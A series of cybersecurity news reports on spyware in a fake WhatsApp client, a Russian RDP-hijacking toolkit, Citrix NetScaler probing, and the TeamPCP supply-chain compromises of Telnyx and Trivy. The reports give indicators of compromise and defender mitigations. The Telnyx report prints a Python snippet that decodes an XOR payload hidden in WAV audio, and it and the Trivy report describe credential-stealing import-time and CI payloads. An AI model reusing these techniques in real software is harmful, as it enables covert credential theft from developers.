Instead of functioning as a standard communication tool, the clone secretly operated as a Trojan horse carrying government-grade spyware.

The malicious campaign was orchestrated by ASIGINT, an Italy-based technology firm that specializes in cyber intelligence solutions.

ASIGINT operates as a subsidiary of SIO Spa, a Cantù-based company historically known for providing interception and surveillance technologies to government agencies and institutional clients.

On its official website, the firm markets itself as a developer of high-performance, field-proven cybersecurity and digital surveillance solutions.

The attackers completely bypassed the security protections of the Apple App Store and Google Play Store by utilizing less-controlled, third-party distribution channels.

They relied heavily on social engineering, a psychological manipulation technique that aims to trick specific individuals into willingly downloading unverified software. This meant the attack succeeded due to human vulnerability and misplaced trust rather than any technical zero-day exploit.

Security researchers have identified the underlying malware embedded in these fake applications as “Spyrtacus,” a surveillance tool discovered within the spyware’s code.

Once installed on a victim’s iPhone or Android device, the spyware grants external actors extensive access to sensitive smartphone data.

This illicit access allows the software to steal text messages, extract chat histories, copy call logs, and even covertly record audio and video using the device’s microphone and camera.

Meta Warns of Sophisticated Attack

Meta’s internal security team proactively identified roughly 200 individuals who had successfully downloaded and activated this malicious third-party client. The tech giant noted that the surveillance campaign was highly targeted rather than a mass-distribution effort, with the vast majority of victims residing in Italy.

While Meta has not disclosed the specific identities of the targets, the nature of the spyware suggests they were individuals of specific interest to the surveillance firm’s clients

Upon discovering the active surveillance campaign, Meta immediately intervened to protect the targeted individuals from further data extraction. The company proactively logged the affected users out of their WhatsApp accounts and severed the unauthorized connections to the platform’s servers.

Victims subsequently received a direct alert warning them about the severe privacy risks and instructing them to delete the fraudulent client immediately, Repubblica reported.

WhatsApp explicitly emphasized that this targeted espionage operation did not exploit any inherent vulnerabilities within the official application, its infrastructure, or its cryptographic protocols.

Personal communications sent through the legitimate WhatsApp application remain fully protected by the platform’s standard end-to-end encryption and default privacy settings.

The company maintains continuous monitoring systems specifically designed to detect and block compromised or unofficial clients attempting to access its network.

This is not the first time SIO Spa has been implicated in distributing deceptive surveillance applications. In early 2025, security researchers exposed a similar Android-based campaign by the company that utilized fake customer support applications impersonating Italian mobile providers like TIM, Vodafone, and WINDTRE.

This latest operation marks a significant escalation in their tactics, as they have now successfully expanded their spyware capabilities to target Apple’s highly restricted iOS ecosystem.

Users who suspect their devices have been compromised are advised to immediately delete the unofficial application and run a comprehensive security sweep.

Cybersecurity experts strongly recommend performing a factory reset on the device to completely eradicate any lingering spyware components. Finally, affected individuals should reinstall the official WhatsApp application directly from trusted digital storefronts to ensure their ongoing communications remain secure.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post WhatsApp Warns Users Targeted by Spyware Attack via Weaponized Version of the App appeared first on Cyber Security News.

A newly disclosed Russian-linked remote access toolkit called “CTRL” is being used to hijack Remote Desktop Protocol sessions and steal credentials from Windows systems.

According to Censys ARC, the malware is a custom .NET framework that combines phishing, keylogging, reverse tunneling, and persistence into one attack chain.

Censys ARC said the toolkit was discovered during open directory scanning after researchers found a malicious LNK file and three hosted .NET payloads tied to the domain hui228[.]ru.

According to Censys, the framework had not appeared on public malware repositories or major threat intelligence feeds at the time of analysis, suggesting it may be privately used rather than broadly distributed.

Remote Access Toolkit “CTRL”

The researchers linked the operation to a Russian-speaking developer based on Russian-language strings, development artifacts, and supporting infrastructure details.

Censys ARC also observed that the toolkit was built for modern Windows systems, including recent releases, showing that the malware is under active development.

The attack starts with a weaponized shortcut file disguised as a folder named like a private key archive.

According to Censys, the LNK file launches hidden PowerShell code that decodes and runs a multi-stage loader entirely in memory.

Censys ARC found that the malware stores payloads inside Windows registry keys under Explorer-related paths. Hence, they blend in with normal system data.

The stager then creates scheduled tasks, adds firewall rules, downloads additional components, and prepares the system for long-term access.

The report also says the malware can bypass User Account Control using a registry hijack and a signed Microsoft binary. Once elevated, it installs the rest of the toolkit and maintains access across reboots.

RDP Hijacking and Credential Theft

One of the most dangerous parts of CTRL is its ability to enable hidden RDP access. According to the Censys ARC report, the malware patches termsrv.dll and installs RDP Wrapper so attackers can create concurrent remote desktop sessions without alerting the victim.

The toolkit also includes a fake Windows Hello PIN prompt. Censys researchers said the phishing window closely copies the real Windows interface, displays the victim’s actual account details, and validates stolen PINs against the real authentication process.

In addition, the malware runs a background keylogger and supports command execution via a named pipe named ctrlPipe.

According to Censys, this allows the operator to control the infected machine locally via the compromised RDP session rather than using a noisy traditional command-and-control channel.

To reduce network visibility, CTRL uses Fast Reverse Proxy (FRP) to establish reverse tunnels back to operator-controlled infrastructure.

Censys ARC reported that the malware used infrastructure tied to 194.33.61.36, 109.107.168.18, and the domain hui228[.]ru.

This design helps the attacker avoid classic beaconing patterns often seen in commodity remote access trojans.

According to Censys, the operator can move through tunneled RDP and shell access while leaving fewer obvious network traces.

Indicators of Compromise

The IP 194.33.61.36 is used for payload hosting and as an FRP relay server. The IP 109.107.168.18 acts as a secondary FRP relay on port 7000.

The domain hui228[.]ru is used for command-and-control via dynamic DNS.

A malicious registry entry is created at HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\, storing the payload as ShellStateVersion1.

The file C:\Temp\keylog.txt is used to store captured keystrokes. The fileC:\ProgramData\frp\frpc.toml contains hidden FRP configuration and C2 tokens.

A named pipe calledctrlPipe is used for local command-and-control communication. Censys ARC recommends monitoring for unusual binary data written to Explorer registry keys, unexpected scheduled tasks, RDP Wrapper installation, and hidden administrator-level accounts.

Defenders should also watch for outbound FRP traffic and systems making suspicious connections to the listed infrastructure.

The post Russian Hackers Using Remote Access Toolkit “CTRL” for  RDP Hijacking appeared first on Cyber Security News.

Cybersecurity researchers are sounding the alarm over imminent in-the-wild exploitation of a recently disclosed critical vulnerability in Citrix NetScaler ADC and Gateway appliances.

Threat intelligence firm watchTowr and Defused Cyber have detected active reconnaissance campaigns specifically targeting CVE-2026-3055, a high-severity memory overread flaw that could allow unauthenticated attackers to extract sensitive data.

Organizations relying on affected Citrix instances are urged to apply patches immediately before the reconnaissance phase transitions into full-scale attack campaigns.

Telemetry captured from honeypot networks shows threat actors actively utilizing POST requests to probe NetScaler appliances and uncover vulnerable authentication setups.

Citrix NetScaler Vulnerability

Assigned a CVSS score of 9.3, CVE-2026-3055 stems from insufficient input validation that leads to an out-of-bounds memory read condition within the appliance.

To be vulnerable, the NetScaler ADC or Gateway must be explicitly configured to operate as a SAML Identity Provider (SAML IdP). Because this identity federation profile is commonly deployed in enterprise single sign-on (SSO) environments to facilitate cloud service integrations, the potential attack surface remains substantial.

The vulnerability draws concerning parallels to the infamous “CitrixBleed” exploits of previous years, as it provides threat actors with a purely unauthenticated mechanism to leak and read sensitive memory contents from targeted enterprise deployments.

The flaw requires no user interaction and can be triggered remotely via maliciously crafted network requests directed at the vulnerable SAML endpoint.

Through its global Attacker Eye honeypot network, watchTowr has observed threat actors actively probing internet-facing NetScaler infrastructure to identify vulnerable configurations.

The current reconnaissance activity primarily focuses on programmatic authentication method fingerprinting. Telemetry reveals that attackers are heavily targeting the /cgi/GetAuthMethods endpoint with HTTP POST requests to systematically enumerate the enabled authentication flows on exposed instances.

This specific probing technique is directly linked to the environmental exploitation requirements of CVE-2026-3055. By analyzing the responses from the /cgi/GetAuthMethods endpoint, threat actors can accurately determine whether a target NetScaler instance is configured as a SAML IdP.

This confirms its susceptibility to the memory overread exploit without having to launch the attack blindly. This programmatic filtering allows attackers to efficiently build highly targeted hit lists of vulnerable appliances for impending mass exploitation campaigns.

The detection of specific, configuration-aware fingerprinting indicates a high level of attacker intent and capability. Security experts explicitly warn that the window between this specialized reconnaissance and widespread active exploitation is rapidly closing.

Administrators operating NetScaler instances as a SAML IdP face an acute and immediate patching mandate. Organizations are strongly advised to halt non-critical operational tasks to prioritize the immediate deployment of the latest Citrix security updates, ensuring their perimeter identity infrastructure remains resilient against this critical threat architecture.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Hackers Probe Citrix NetScaler Instances Ahead of Likely CVE-2026-3055 Exploitation appeared first on Cyber Security News.

Iran-linked hackers have claimed responsibility for breaching FBI Director Kash Patel’s personal Gmail inbox, leaking photographs, documents, and email correspondence online.

The hacker group Handala Hack Team announced the breach on their website, declaring that Patel “will now find his name among the list of successfully hacked victims.”

The leaked materials, totaling approximately 800 megabytes, include personal photographs, Patel’s purported resume, and hundreds of emails primarily spanning from 2010 to 2019.

A Justice Department official confirmed to Reuters that Patel’s emails had indeed been compromised and that the published material appeared to be authentic. The FBI did not immediately respond to requests for comment.

Who Is Handala Hack Team?

Handala describes itself as a pro-Palestinian vigilante hacking group and is believed by Western cybersecurity researchers to be one of several online personas operated by Iranian government cyberintelligence units.

The group’s announcement mocked U.S. security infrastructure, writing: “Today, once again, the world witnessed the collapse of America’s so-called security legends.” Handala also issued a chilling warning: “If your director can be compromised this easily, what do you expect from your lower-level employees?”

The hack appears to be a direct response to prior U.S. government action against Handala. The U.S. government had previously seized the group’s web domains following a cyberattack that disrupted systems at Stryker, a major U.S. medical equipment company, for approximately one week.

The U.S. also announced a $10 million bounty for information on Handala’s members. The group relocated its operations to a new domain hosted under the .to top-level domain of Tonga, a South Pacific island nation, to evade takedowns.

The incident raises serious concerns about the cybersecurity hygiene of senior U.S. officials who may use personal email accounts for professional communications a vulnerability that threat actors continue to exploit

Handala’s attack underscores the persistent and evolving threat posed by Iranian-linked cyber actors, who have increasingly targeted high-profile U.S. government figures in recent years.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post FBI Chief Kash Patel’s Gmail Account was Hacked by Iranian Hackers appeared first on Cyber Security News.

The official Telnyx Python SDK on PyPI was compromised this morning as part of an escalating, weeks-long supply chain campaign orchestrated by the threat actor group TeamPCP.

Malicious versions 4.87.1 and 4.87.2 of the telnyx package were uploaded to PyPI at 03:51 UTC on March 27, 2026, with the payload executing silently at import time on both Windows and Linux/macOS systems.

Organizations using these versions should treat affected environments as fully compromised and immediately rotate all exposed credentials.

TeamPCP Supply Chain Attack

The Telnyx compromise is not an isolated event it is the latest link in a credential-chaining supply chain campaign that TeamPCP has been executing since March 19, 2026.

The group’s operating pattern is precise and repeatable: compromise a trusted security or developer tool, steal the CI/CD credentials it exposes, use those credentials to poison the next target in the chain, harvest whatever secrets the new environment holds, and repeat.

The campaign timeline reads as follows:

• March 19: Aqua Security’s open-source vulnerability scanner Trivy was backdoored, assigned CVE-2026-33634 (CVSS 9.4). TeamPCP force-pushed malicious binaries to 75 of 77 trivy-action tags and 7 setup-trivy tags, harvesting CI/CD secrets including npm tokens, Docker Hub credentials, and PyPI publishing tokens from every pipeline running Trivy without version pinning. By end of day, 44 Aqua Security GitHub repositories were renamed with the prefix tpcp-docs-.
• March 20: Using stolen npm tokens from Trivy victims, TeamPCP deployed the CanisterWorm backdoor across 46+ npm packages. The worm automated token-to-compromise: given one stolen npm token, it enumerated all publishable packages, bumped versions, and published malicious releases across entire scopes in under 60 seconds.
• March 22: Researchers observed TeamPCP deploying WAV steganography to deliver payloads in a Kubernetes wiper variant. A malware payload was embedded inside .wav audio files — disguising binary data as valid audio frames — marking the debut of a technique that would reappear five days later in the Telnyx compromise.
• March 23: Checkmarx’s kics-github-action and ast-github-action GitHub Actions were compromised, along with two OpenVSX extensions (cx-dev-assist 1.7.0 and ast-results 2.53.0). The attacker hijacked 35 tags between 12:58 and 16:50 UTC using a new C2 domain, checkmarx[.]zone, impersonating Checkmarx’s brand. Malicious code was removed approximately three hours later.
• March 24: LiteLLM versions 1.82.7 and 1.82.8 were published to PyPI using credentials stolen from LiteLLM’s CI/CD pipeline, which itself ran unpinned Trivy. LiteLLM serves roughly 95 million downloads per month and is widely deployed as a centralized LLM gateway with access to credentials for OpenAI, Anthropic, AWS Bedrock, GCP Vertex AI, and more. PyPI quarantined the packages within approximately three hours. The C2 was models[.]litellm[.]cloud.
• March 27 (today): Telnyx — with 742,000 downloads over the past month — becomes the latest victim.

The Telnyx Payload: Import-Time Execution

According to Akidio advisory, the malicious injection in the Telnyx package resides in telnyx/_client.py and runs at import time. There is no install hook to disable, no postinstall script to block the malware executes the moment a developer or application calls import telnyx. The attack forks into two execution paths depending on the host operating system.

On Windows, the payload downloads hangup.wav from the attacker’s C2 at 83[.]142[.]209[.]203:8080. The audio file’s frame data contains a base64-encoded, XOR-obfuscated executable.

After decoding, the dropper writes the executable to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\msbuild.exe, ensuring it executes silently on every system login. A hidden .lock file enforces a 12-hour re-drop cooldown to reduce detection surface.

On Linux and macOS, a complete second-stage Python script is hardcoded as a base64 blob in _client.py at line 459. This script fetches ringtone.wav from the same C2, decodes a third-stage collector script from the WAV frames using the same XOR technique, and executes it via sys.executable piped to stdin.

The collected output is encrypted with AES-256-CBC; the session key is wrapped with an attacker-held RSA-4096 public key (OAEP), ensuring only the attacker can decrypt the exfiltrated data. The exfil bundle is transmitted via HTTP POST with the header X-Filename: tpcp.tar.gz.

The WAV Steganography Technique

The payload delivery mechanism deserves particular attention. Rather than fetching a raw binary or a Python script — both of which raise content-filtering and URL-inspection alarms — TeamPCP delivers its payloads disguised as .wav audio files. The files are structurally valid audio and pass MIME-type checks. The malicious content is concealed within the audio frame data using the following decode logic:

with wave.open(wf, 'rb') as w:
    b = base64.b64decode(w.readframes(w.getnframes()))
    s, m = b[:8], b[8:]
    payload = bytes([m[i] ^ s[i % len(s)] for i in range(len(m))])

The first 8 bytes of the decoded frame data serve as the XOR key; the remainder is the obfuscated payload. Content-based security filters inspecting the file as audio will find nothing anomalous.

This technique was first observed in TeamPCP’s Kubernetes wiper on March 22. Its reuse in the Telnyx package just five days later — carrying both the Windows dropper and the Linux infostealer confirms that TeamPCP has standardized it as part of their toolkit.

Indicators of Compromise

Mitigation Steps

Organizations that installed telnyx==4.87.1 or telnyx==4.87.2 should take the following actions without delay:

1. Remove the malicious versions — Downgrade to telnyx==4.87.0 and pin the version explicitly in all dependency files.
2. Treat the environment as compromised — Rotate all API keys, database credentials, SSH keys, cloud provider tokens, and any other secrets accessible from the affected machine or CI/CD pipeline.
3. Windows-specific — Check for msbuild.exe in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ and delete it along with any accompanying .lock file.
4. Network monitoring — Block and monitor for all outbound HTTP traffic to 83[.]142[.]209[.]203:8080.
5. Audit CI/CD pipelines — Review whether any build pipelines running the affected Telnyx versions also had access to credentials for other packages or platforms, as TeamPCP’s documented behavior is to use each compromise to enable the next.

Given the FBI’s assessment following the LiteLLM compromise that “a surge in breach disclosures, follow-on intrusions, and extortion attempts” is expected in the coming weeks, organizations integrating Python-based telecommunications or AI infrastructure packages should urgently audit their dependency trees and enforce version pinning across all environments.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Telnyx PyPI Package With 742,000 downloads Compromised in TeamPCP Supply Chain Attack appeared first on Cyber Security News.

The notorious hacking collective LAPSUS$ has resurfaced, allegedly claiming responsibility for a significant data breach involving the multinational pharmaceutical and biotechnology company AstraZeneca.

The threat actors are currently attempting to sell a compressed 3GB internal data dump, signaling a potential shift towards pay-to-access extortion methods.

LAPSUS$, previously known for high-profile breaches targeting major technology firms, appears to be active again with this alleged compromise of AstraZeneca’s internal systems. The group has posted teasers of the stolen data on illicit forums, detailing the contents of the .tar.gz archive and providing screenshots as proof.

The threat actors are attempting to entice potential buyers to contact them via the secure messaging application Session to negotiate a purchase. Currently, no full leak has been made publicly available for free, indicating that the group’s primary motive in this instance is financial gain through a direct sale rather than immediate public extortion.

The threat actors have also provided password-protected paste links containing redacted secrets as further proof of access to prospective buyers. AstraZeneca has not commented on the incident, and no official statement has been released as of March 20, 2026.

AstraZeneca Data Breach Claims

According to the threat actors’ claims on the breach forum, the 3GB data dump contains a wide array of highly sensitive intellectual property and infrastructure configuration details.

To substantiate their claims, the attackers have released public samples revealing specific internal repository structures and project details. The exposed directory tree highlights a root folder named AZU_EXFIL, which contains a critical supply-chain portal repository identified as als-sc-portal-internal.

This internal portal appears to manage several core logistical functions crucial to pharmaceutical distribution, including forecasting, inventory tracking, product master data management, SAP system integration, and On-Time In-Full (OTIF) delivery metrics.

These exposed details suggest that the breach, if legitimate, could have far-reaching implications for AstraZeneca’s internal supply chain operations and overall cloud infrastructure security.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post AstraZeneca Data Breach – LAPSUS$ Group Allegedly Claims Access to Internal Data appeared first on Cyber Security News.

A sophisticated supply chain attack targeting the official Trivy GitHub Action (aquasecurity/trivy-action) has compromised continuous integration and continuous deployment (CI/CD) pipelines globally.

Disclosed in late March 2026, this incident marks the second distinct compromise affecting the Trivy ecosystem within a single month.

Threat actors successfully force-pushed 75 out of 76 existing version tags to distribute a malicious infostealer. With over 10,000 GitHub workflow files relying on this action, the potential credential theft blast radius is massive.

Mechanics of the Tag Poisoning Attack

Instead of pushing code to a branch or creating a new release, the attacker leveraged residual write access from an earlier credential breach to alter existing version tags silently.

The threat actor force-pushed 75 tags, including widely used versions like @0.33.0 and @0.18.0, to point to newly forged commits.

This effectively turned trusted and supposedly immutable version references into a direct distribution mechanism for their custom infostealer malware.

By completely bypassing the need to create new releases, the attacker minimized the chances of triggering automated security alerts or notifying project maintainers of unauthorized branch updates.

To evade detection, the attacker spoofed the Git commit metadata. They cloned the original author names, dates, and commit messages to make the malicious commits appear legitimate in the repository logs.

The modified code used the current master file tree but swapped the legitimate entrypoint.sh file with an infected version.

Because the malicious commit dates conflicted with the March 2026 parent commit, and the commits lacked GitHub’s web-flow GPG signature, careful inspection reveals the forgery. Notably, version @0.35.0 remained untouched and is the only safe tag.

The injected 204-line entrypoint.sh script executes its malicious operations before running the legitimate Trivy scan, allowing it to hide in plain sight.

According to Socket, the infostealer operates in three distinct stages: targeted collection, robust encryption, and stealthy exfiltration.

During the collection phase, the malware targets both GitHub-hosted and self-hosted runners. On GitHub-hosted Linux environments, it uses passwordless sudo privileges to dump the Runner.Worker process memory and extract secrets directly from the heap.

On self-hosted runners, a comprehensive Python script scrapes the filesystem for sensitive data across multiple directories.

This script systematically hunts for SSH keys, database credentials, CI/CD configuration files, and even cryptocurrency wallet data, ensuring an extensive haul of valuable information.

In the second stage, the stolen data is compressed and encrypted using AES-256-CBC, and the encryption key is wrapped with an RSA-4096 public key.

Finally, the malware attempts to exfiltrate the encrypted bundle via an HTTPS POST request to a typosquatted domain, scan[.]aquasecurtiy[.]org.

If this primary channel fails, the script uses the victim’s own GitHub Personal Access Token to create a public repository named tpcp-docs and uploads the stolen data as a release asset.

The malware self-identifies as the “TeamPCP Cloud stealer”. Security researchers track TeamPCP as a cloud-native threat actor known for exploiting misconfigured infrastructure for ransomware and cryptomining operations.

Organizations must immediately stop referencing trivy-action by version tags, with the exception of @0.35.0. To ensure complete security, pipelines should pin the action to the specific safe commit SHA (57a97c7e7821a5776cebc9bb87c984fa69cba8f1).

Any environment that executed a poisoned tag must be considered fully compromised. Security teams should urgently rotate all exposed secrets, including cloud credentials and API tokens.

Additionally, administrators should audit their GitHub organizations for unauthorized tpcp-docs repositories.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Hackers Compromise Trivy Scanner to Inject malicious Scripts and Steal Login Credentials appeared first on Cyber Security News.